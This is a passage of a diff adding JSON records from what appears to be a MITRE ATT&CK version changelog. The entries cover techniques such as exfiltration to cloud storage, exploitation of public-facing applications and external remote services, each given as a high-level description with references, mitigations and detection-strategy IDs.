+                            "DET0153: Detection Strategy for Exfiltration Over Webhook"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 15:04:32.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Exfiltration to Cloud Storage",
+                    "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1567/002",
+                            "external_id": "T1567.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:19.048000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0570: Detection Strategy for Exfiltration to Cloud Storage"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:51:11.772000+00:00",
+                    "modified": "2026-05-12 15:12:00.686000+00:00",
+                    "name": "Exfiltration to Code Repository",
+                    "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "exfiltration"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1567/001",
+                            "external_id": "T1567.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.686000+00:00\", \"old_value\": \"2025-10-24 17:49:04.207000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0318: Detection Strategy for Exfiltration to Code Repository"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Exploit Public-Facing Application",
+                    "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1190",
+                            "external_id": "T1190"
+                        },
+                        {
+                            "source_name": "CWE top 25",
+                            "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.",
+                            "url": "https://cwe.mitre.org/top25/index.html"
+                        },
+                        {
+                            "source_name": "CIS Multiple SMB Vulnerabilities",
+                            "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.",
+                            "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/"
+                        },
+                        {
+                            "source_name": "Ars Technica VMWare Code Execution Vulnerability 2021",
+                            "description": "Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.",
+                            "url": "https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/"
+                        },
+                        {
+                            "source_name": "Recorded Future ESXiArgs Ransomware 2023",
+                            "description": "German Hoeffner, Aaron Soehnen and Gianni Perez. (2023, February 7). ESXiArgs Ransomware Targets Publicly-Exposed ESXi OpenSLP Servers. Retrieved March 26, 2025.",
+                            "url": "https://www.recordedfuture.com/blog/esxiargs-ransomware-targets-vmware-esxi-openslp-servers"
+                        },
+                        {
+                            "source_name": "Wired Russia Cyberwar",
+                            "description": "Greenberg, A. (2022, November 10). Russia\u2019s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.",
+                            "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"
+                        },
+                        {
+                            "source_name": "Mandiant Fortinet Zero Day",
+                            "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"
+                        },
+                        {
+                            "source_name": "NVD CVE-2016-6662",
+                            "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.",
+                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662"
+                        },
+                        {
+                            "source_name": "NVD CVE-2014-7169",
+                            "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.",
+                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        },
+                        {
+                            "source_name": "OWASP Top 10",
+                            "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+                            "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018",
+                            "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Yossi Weizman, Azure Defender Research Team",
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:41.788000+00:00\"}}}",
+                    "previous_version": "2.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1016: Vulnerability Scanning",
+                            "M1026: Privileged Account Management",
+                            "M1030: Network Segmentation",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1037: Filter Network Traffic",
+                            "M1048: Application Isolation and Sandboxing",
+                            "M1050: Exploit Protection",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0080: Exploit Public-Facing Application \u2013 multi-signal correlation (request \u2192 error \u2192 post-exploit process/egress)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--01c9b54f-c04e-41ba-b0c3-cfe784b3a463",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:27.621000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Exploitation for Defense Impairment",
+                    "description": "Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. \n \nAdversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. \n\nVulnerabilities may exist in security tools such as antivirus, endpoint detection and response (EDR), firewalls, or other monitoring solutions. Adversaries may use prior reconnaissance or perform discovery activities (e.g., [Software Discovery](https://attack.mitre.org/techniques/T1518)) to identify defensive tools present in an environment and target them for exploitation. \n\nSuccessful exploitation may allow adversaries to terminate security processes, disable protections, bypass enforcement mechanisms, or reduce the effectiveness of defensive controls. In some cases, vulnerabilities in cloud-based or SaaS infrastructure may also be leveraged to bypass built-in security boundaries or disrupt visibility and enforcement across environments.(Citation: Salesforce zero-day in facebook phishing attack)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1687",
+                            "external_id": "T1687"
+                        },
+                        {
+                            "source_name": "Salesforce zero-day in facebook phishing attack",
+                            "description": "Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.",
+                            "url": "https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2026-04-16 20:10:42.138000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0900: Detection of Defense Impairment"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Exploitation for Stealth",
+                    "description": "Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components. \n\nAdversaries may exploit a system or application vulnerability to avoid detection while maintaining access within an environment. Exploitation occurs when an adversary leverages a programming flaw to execute code in a manner that minimizes visibility or blends in with legitimate activity. \n\nRather than directly disabling defenses, adversaries may use exploitation to circumvent monitoring and logging mechanisms. This can include abusing vulnerabilities in logging pipelines, security tools, or cloud infrastructure to evade audit trails, suppress alerts, or operate without generating telemetry. \n\nAdversaries may identify these opportunities through prior reconnaissance or by performing discovery of security controls after initial access. In some cases, vulnerabilities in SaaS or public cloud environments may be exploited to evade logging, obscure activity, or deploy infrastructure that remains hidden from standard monitoring tools.(Citation: Bypassing CloudTrail in AWS Service Catalog)(Citation: GhostToken GCP flaw)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1211",
+                            "external_id": "T1211"
+                        },
+                        {
+                            "source_name": "Bypassing CloudTrail in AWS Service Catalog",
+                            "description": "Nick Frichette. (2023, March 20). Bypassing CloudTrail in AWS Service Catalog, and Other Logging Research. Retrieved September 18, 2023.",
+                            "url": "https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/"
+                        },
+                        {
+                            "source_name": "GhostToken GCP flaw",
+                            "description": "Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.",
+                            "url": "https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "John Lambert, Microsoft Threat Intelligence Center"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows",
+                        "macOS",
+                        "SaaS",
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 13:36:04.483000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1019: Threat Intelligence Program",
+                            "M1048: Application Isolation and Sandboxing",
+                            "M1050: Exploit Protection",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0595: Detection Strategy for Exploitation for Stealth"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:44.421000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "External Remote Services",
+                    "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)\n\nAdversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access.(Citation: The BadPilot campaign) Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.(Citation: Russian threat actors dig in, prepare to seize on war fatigue)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1133",
+                            "external_id": "T1133"
+                        },
+                        {
+                            "source_name": "Volexity Virtual Private Keylogging",
+                            "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.",
+                            "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"
+                        },
+                        {
+                            "source_name": "MacOS VNC software for Remote Desktop",
+                            "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.",
+                            "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac"
+                        },
+                        {
+                            "source_name": "Unit 42 Hildegard Malware",
+                            "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.",
+                            "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
+                        },
+                        {
+                            "source_name": "Russian threat actors dig in, prepare to seize on war fatigue",
+                            "description": "Microsoft Threat Intelligence. (2023, December 7). Russian threat actors dig in, prepare to seize on war fatigue. Retrieved June 18, 2025.",
+                            "url": "https://www.microsoft.com/en-us/security/security-insider/intelligence-reports/russian-threat-actors-dig-in-prepare-to-seize-on-war-fatigue"
+                        },
+                        {
+                            "source_name": "The BadPilot campaign",
+                            "description": "Microsoft Threat Intelligence. (2025, February 12). The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation. Retrieved June 18, 2025.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology"
+                        },
+                        {
+                            "source_name": "Trend Micro Exposed Docker Server",
+                            "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ExtraHop",
+                        "David Fiser, @anu4is, Trend Micro",
+                        "Alfredo Oliveira, Trend Micro",
+                        "Idan Frimark, Cisco",
+                        "Rory McCune, Aqua Security",
+                        "Yuval Avrahami, Palo Alto Networks",
+                        "Jay Chen, Palo Alto Networks",
+                        "Brad Geesaman, @bradgeesaman",
+                        "Magno Logan, @magnologan, Trend Micro",
+                        "Ariel Shuper, Cisco",
+                        "Yossi Weizman, Azure Defender Research Team",
+                        "Vishwas Manral, McAfee",
+                        "Daniel Oakley",
+                        "Travis Smith, Tripwire",
+                        "David Tayouri",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-10-24 17:48:24.982000+00:00\"}}}",
+                    "previous_version": "2.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0354: Behavior-chain detection for T1133 External Remote Services across Windows, Linux, macOS, Containers"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:21.689000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Fallback Channels",
+                    "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1008",
+                            "external_id": "T1008"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-24 17:49:35.854000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0499: Behavioral Detection of Fallback or Alternate C2 Channels"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:04.710000+00:00",
+                    "modified": "2026-05-12 15:12:00.644000+00:00",
+                    "name": "File and Directory Discovery",
+                    "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1083",
+                            "external_id": "T1083"
+                        },
+                        {
+                            "source_name": "Windows Commands JPCERT",
+                            "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+                            "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
